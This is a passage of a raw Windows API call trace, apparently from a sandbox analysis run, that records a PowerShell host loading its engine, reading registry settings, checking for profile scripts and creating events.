AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.233] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.242] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.242] GetLastError () returned 0xcb [0051.627] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x21a678 [0051.628] GetLastError () returned 0x0 [0051.629] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x21a700 [0051.629] GetLastError () returned 0x0 [0051.734] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.761] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.762] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.763] VirtualQuery (in: lpAddress=0x19c434, lpBuffer=0x19d434, dwLength=0x1c | out: lpBuffer=0x19d434*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.795] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.795] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.795] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.795] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.795] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.795] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.795] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.795] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.795] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.796] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.797] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.797] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19db7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.805] GetLastError () returned 0xcb [0051.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19db2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.805] GetLastError () returned 0xcb [0051.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19db2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.805] GetLastError () returned 0xcb [0051.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19db2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.805] GetLastError () returned 0xcb [0051.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19db7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.812] GetLastError () returned 0xcb [0051.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19db2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.812] GetLastError () returned 0xcb [0051.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19db2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.812] GetLastError () returned 0xcb [0051.812] VirtualQuery (in: lpAddress=0x19d0a8, lpBuffer=0x19e0a8, dwLength=0x1c | out: lpBuffer=0x19e0a8*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19db7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.813] GetLastError () returned 0xcb [0051.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19db2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.813] GetLastError () returned 0xcb [0051.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19db2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.813] GetLastError () returned 0xcb [0051.814] VirtualQuery (in: lpAddress=0x19d0a0, lpBuffer=0x19e0a0, dwLength=0x1c | out: lpBuffer=0x19e0a0*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.814] VirtualQuery (in: lpAddress=0x19cd54, lpBuffer=0x19dd54, dwLength=0x1c | out: lpBuffer=0x19dd54*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.814] VirtualQuery (in: lpAddress=0x19cd54, lpBuffer=0x19dd54, dwLength=0x1c | out: lpBuffer=0x19dd54*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.816] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e7dc | out: phkResult=0x19e7dc*=0x3a8) returned 0x0 [0051.816] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e824, lpData=0x0, lpcbData=0x19e820*=0x0 | out: lpType=0x19e824*=0x1, lpData=0x0, lpcbData=0x19e820*=0x56) returned 0x0 [0051.816] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e824, lpData=0x247300, lpcbData=0x19e820*=0x56 | out: lpType=0x19e824*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x19e820*=0x56) returned 0x0 [0051.816] RegCloseKey (hKey=0x3a8) returned 0x0 [0051.816] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e7dc | out: phkResult=0x19e7dc*=0x3a8) returned 0x0 [0051.816] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e824, lpData=0x0, lpcbData=0x19e820*=0x0 | out: lpType=0x19e824*=0x1, lpData=0x0, lpcbData=0x19e820*=0x56) returned 0x0 [0051.816] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e824, lpData=0x247300, lpcbData=0x19e820*=0x56 | out: lpType=0x19e824*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x19e820*=0x56) returned 0x0 [0051.817] RegCloseKey (hKey=0x3a8) returned 0x0 [0051.818] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x247300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0051.818] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x19e374, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0051.818] GetLastError () returned 0x3f0 [0051.818] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x247300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0051.818] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x19e374, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0051.818] GetLastError () returned 0x3f0 [0051.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x19e40c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0051.819] GetLastError () returned 0x3f0 [0051.819] SetErrorMode (uMode=0x1) returned 0x1 [0051.819] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x19e88c | out: lpFileInformation=0x19e88c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.819] GetLastError () returned 0x2 [0051.819] SetErrorMode (uMode=0x1) returned 0x1 [0051.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x19e40c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0051.820] GetLastError () returned 0x2 [0051.820] SetErrorMode (uMode=0x1) returned 0x1 [0051.820] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x19e88c | out: lpFileInformation=0x19e88c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.820] GetLastError () returned 0x2 [0051.820] SetErrorMode (uMode=0x1) returned 0x1 [0051.820] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x19e40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45 [0051.820] GetLastError () returned 0x2 [0051.820] SetErrorMode (uMode=0x1) returned 0x1 [0051.820] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x19e88c | out: lpFileInformation=0x19e88c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.820] GetLastError () returned 0x3 [0051.820] SetErrorMode (uMode=0x1) returned 0x1 [0051.820] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x19e40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a [0051.820] GetLastError () returned 0x3 [0051.820] SetErrorMode (uMode=0x1) returned 0x1 [0051.820] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x19e88c | out: lpFileInformation=0x19e88c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.820] GetLastError () returned 0x3 [0051.820] SetErrorMode (uMode=0x1) returned 0x1 [0051.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.821] GetLastError () returned 0xcb [0051.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.823] GetLastError () returned 0xcb [0051.825] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.825] GetLastError () returned 0xcb [0051.826] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.826] GetLastError () returned 0xcb [0051.827] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.827] GetLastError () returned 0xcb [0051.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.835] GetLastError () returned 0xcb [0051.835] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a8 [0051.835] GetLastError () returned 0x0 [0051.835] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3ac [0051.835] GetLastError () returned 0x0 [0051.835] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b0 [0051.835] GetLastError () returned 0x0 [0051.835] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b4 [0051.835] GetLastError () returned 0x0 [0051.836] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3b8 [0051.836] GetLastError () returned 0x0 [0051.836] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3bc [0051.836] GetLastError () returned 0x0 [0051.836] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3dc [0051.836] GetLastError () returned 0x0 [0051.836] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a0 [0051.836] GetLastError () returned 0x0 [0051.836] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4 [0051.836] GetLastError () returned 0x0 [0051.836] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3c8 [0051.836] GetLastError () returned 0x0 [0051.836] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328 [0051.836] GetLastError () returned 0x0 [0051.836] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c [0051.836] GetLastError () returned 0x0 [0051.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.838] GetLastError () returned 0xcb [0051.842] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0051.842] GetLastError () returned 0xcb [0051.843] GetConsoleMode (in: hConsoleHandle=0x0, lpMode=0x19e8cc | out: lpMode=0x19e8cc) returned 0 [0051.843] GetLastError () returned 0x6 [0051.844] SetEvent (hEvent=0x3b4) returned 1 [0051.844] GetLastError () returned 0x6 [0051.844] SetEvent (hEvent=0x3a8) returned 1 [0051.844] GetLastError () returned 0x6 [0051.844] SetEvent (hEvent=0x3ac) returned 1 [0051.844] GetLastError () returned 0x6 [0051.844] SetEvent (hEvent=0x3b0) returned 1 [0051.844] GetLastError () returned 0x6 [0051.844] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3cc [0051.844] GetLastError () returned 0x0 [0051.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.845] GetLastError () returned 0xcb [0051.845] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e730 | out: phkResult=0x19e730*=0x34c) returned 0x0 [0051.845] RegQueryValueExW (in: hKey=0x34c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x19e778, lpData=0x0, lpcbData=0x19e774*=0x0 | out: lpType=0x19e778*=0x0, lpData=0x0, lpcbData=0x19e774*=0x0) returned 0x2 [0053.807] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x38c [0053.807] GetLastError () returned 0x0 [0053.807] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x390 [0053.807] GetLastError () returned 0x0 [0053.807] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394 [0053.807] GetLastError () returned 0x0 [0053.807] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 